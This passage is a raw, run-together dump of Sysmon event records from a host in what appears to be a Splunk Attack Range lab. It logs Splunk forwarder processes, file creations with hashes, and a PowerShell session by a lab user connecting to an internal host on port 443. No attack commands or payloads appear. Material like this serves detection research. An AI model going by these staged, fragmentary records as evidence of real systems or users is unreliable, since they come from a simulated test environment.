Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.720{B81B27B7-8167-613A-8F96-03000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035126642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.451{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC0150DFE47CDCDCD0553370D23E9D6B,SHA256=D5E8724B98E4135E5B09DF57F1DEC9B43BC36AEF384F72727D39CD4206D2DA94,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.035{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8167-613A-8E96-03000000C801}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.035{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.035{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.035{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.035{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.035{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8167-613A-8E96-03000000C801}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.035{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8167-613A-8E96-03000000C801}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.021{B81B27B7-8167-613A-8E96-03000000C801}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035126654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:28.466{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ECFFA07EE94973C42E25E82F52274D1,SHA256=549372BA67337138C3CB9987C8F708754EF6EF6733FF2CE7798340FC5B09D56F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:28.035{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F31FB035991133CAE758207BC1E9635,SHA256=4927C168BA8440DE18BF94616D8F19C5825502D0D44F75783AF57767D8DC7F8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:28.035{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=222E9909C1E2B54C922D7BE431BB1608,SHA256=3430C9405BBA9261B1CB4C423AF2458E0FF19BF40E08864ADCA784A7FDBED15E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:29.480{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A85716C0669CE726B153FBBE83101A3B,SHA256=D07443ADAD224199AE5B966D95E2B6A47BABB433C9DA32439DDDC6EF9922C4D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:30.486{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16185039FC0B29AF17A17C1E467420BC,SHA256=902978F4A60AA8BEBAA006D08A26A78A925DA157348A745072B5FEFB3280FFD2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:56.430{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61923-false10.0.1.12-8000- 354300x800000000000000035126659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:56.371{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61922-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:31.503{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A86347C6916CDF23C27B1C4BD894819A,SHA256=992116667C0BC4CEEDF18D1FC0BF4E28CE29BD792F8C3F6DA3DB968636ECB43C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:31.422{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DCF4C650A63F4009F6FF3347175864DE,SHA256=B8A8B0A8E632AE299F23E538D4B96E9D269B3EB7B1489AC86ADB339413DBAA35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:32.753{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF7247bf40.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:32.569{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CE12C24533C80DC271CAF210F6044AC,SHA256=2E4FF70A88503BEB1D7567D8504C5AE1E3560C12DD885CA4C02A091E9ADFCE46,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:33.584{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5E7927FC5634CED73A21A6B50DE9977,SHA256=A26D1D09D20D8419E2EE1C36BC9C8797FDA3C792834B6744E3120CC36D35CAD8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:34.604{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A6F621BE3F3C17246A21CEC246012AB,SHA256=13C21FE929EB24455E7237D790346439C0D276AC35FFAD74A5F0B1595B57911C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:35.619{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAE16AF587DC0B7E662903E871E27A36,SHA256=9483D89D2C52EF99B943A97501E37EBAD330CAF0BD52ED13A8CD49D27F2B76A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:36.650{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16C269BAED98FC1AFDD8B0504A7DBA63,SHA256=6DAF47828559BC659B68A07E26F1D89DC37DA701972B596EAE2051783CC93711,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:37.934{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=14ECA6AEC8797FA835E36B1D5996D1FF,SHA256=3C75E2C8540959D5AD7CEE9CF37AA76E0B5CFBDBB1F9C9517ADA4E4F0E6D7CC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:37.666{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1E9CB930C628E74999C5CDB408F1CA4,SHA256=5802E66E71171CEFE78C2248A5F69BACC6CC7ACC2DF3D9DC73CC4C297A0503C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:37.235{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=92E5543CC58D0A5CAB098A1AEC5E8B39,SHA256=8FBABA5D0BDDDECCE6BA674E1E174C7D9340F43E74896A8C79E0855EE7B0A27C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:02.395{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61925-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035126673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:02.356{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61924-false10.0.1.12-8000- 23542300x800000000000000035126672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:38.750{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5539B17710F76B6C5F696BD5DF765BC,SHA256=E8D3878F50805C87942099E82EC71699E23C4F884EED914FD812AFCED954B88E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:38.618{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=3EA9D18E53CA241BAACBCB8189F7C009,SHA256=70AB73E939D77127837A7B10222519D8EE8EA6323A2099EE595D304BFA534BC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:39.799{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FD81B1D387C3C6B6A09097F392B0CCB,SHA256=55B4F1B5B25F8CD40846032B6EEE98EE32F040595E9CC1BFEA4EE16569558AA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:40.880{B81B27B7-8174-613A-9096-03000000C801}62565264C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035126684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:40.818{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B05551B85612BCF80ABC6B6AE152EBCD,SHA256=EC7D955B64B36FE7A823B01A82B881B22DF5EE112D60E683E8255B79D2AD3839,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:40.702{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8174-613A-9096-03000000C801}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:40.702{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:40.702{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 